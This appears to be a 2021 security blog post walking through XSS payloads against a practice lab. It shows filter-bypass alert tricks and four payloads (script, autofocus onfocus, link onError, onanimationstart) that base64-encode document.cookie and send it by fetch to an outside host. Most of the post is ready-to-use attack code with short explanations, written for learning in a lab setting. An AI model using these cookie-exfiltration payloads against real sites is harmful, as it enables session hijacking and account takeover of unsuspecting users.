Data Exfiltration with some FUN XSS Tricks
Some fun XSS payloads that I tried to exfiltrate user cookies via XSS…
XSS is one of the most fun client-side attacks that is still not gone, even after 20+ years! Amazing isn’t it. It dates back to 1998 and it’s 2021 now. And we still see a lot of XSS, and a lot of researchers have done great work in sharing cool XSS payloads including (in no particular order) Gareth Heyes, Dr. Mario Heiderich, Michal Bentkwoski, BruteLogic, and many more…
In today’s post, I am going to talk about 4 XSS payloads that could be used to exfiltrate the user session in one of Thexssrat’s labs: http://23.239.9.22/cheeseBlog-2
1 more payload would be shared, but that’s just for an alert :)
The Payloads
Let me start with an alert and then we can set the expectations high with the 4 final payloads.
XSS Payload:
<script>eval(/Alert(document.cookie)/.source.toLowerCase())</script>
What’s so special about it?
If you try to just put alert(1) then the webpage sends back the encoded payload and thus no XSS! So in order to bypass it, I have used regex (/Alert(1)/) and then converted it to the string equivalent (using .source) and then converted it to lowercase.
Ofcourse you could simply take alert in caps and convert it to lowercase, but then you miss the point here… The neat trick is on converting regex to get the string equivalent :)
And talking of neat tricks let me share another bonus trick:
<script>eval(8680439..toString(30)+“(1337)”)</script>
Try it out ;)
Found an alert? Do you know why it worked?
Here’s the post covering the answer to that:
Exfiltrating Session Cookie with XSS!
Okay, back to the main mission — exfiltrating session cookies via XSS!
Payload 1:
<script>fetch(“//lol.lol?code=”+btoa(document.cookie))</script>
Normal script tag using the fetch API to get the session cookies to our domain. As simple as that!
Payload 2:
<input onfocus=“fetch(‘//lol.lol/?code=’+btoa(document.cookie))” autofocus></input>
Input tag with onfocus attribute containing the JS code that would run once the input field is in focus (that is, when the we just clicked on the input box to bring it to focus). And using the autofocus attribute, we just did that! So it didn’t required any user interaction at all to get the cookie to attacker using the fetch API. Again, not that hard, but we have levelled up a bit here…
Let’s move to the next one:
Payload 3:
<link rel=stylesheet href=1 onError=“fetch(‘//lol.lol/?code=’+btoa(document.cookie))”>
Here, the link tag is used to load a CSS and onerror attribute contains the script that gets executed when the error occurs! Notice that onerror is written as onError due to some filtering happening at the backend of this lab. And therefore we bypass that validation by capitalizing the E and it worked :)
Again the fetch API sends the data. This was also quite easy but we saw yet another XSS trick. Let’s move on to the next payload now…
Payload 4:
<style>@keyframes x{}</style><section style=“animation-name:x” onanimationstart=“fetch(‘//lol.lol/?code=’+btoa(document.cookie))”></section>
This one looks like from outer space, hahaha.
Nothing fancy in here. It’s just defining an empty animation which is assigned to a section tag and on animation start, our payload gets executed using the onanimationstart attribute.
Nice one right!
Closing Thoughts
I hope you liked these XSS tricks and hopefully learnt something interesting and had FUN!
Let me know your feedback in the comments below and feel free to connect on twitter: @_SecurityGOAT
Btw if you would like to support my work, consider checking my Patreon page or you can even Buy Me a Coffee :)
See ya!
Until next time, keep learning and happy hacking.
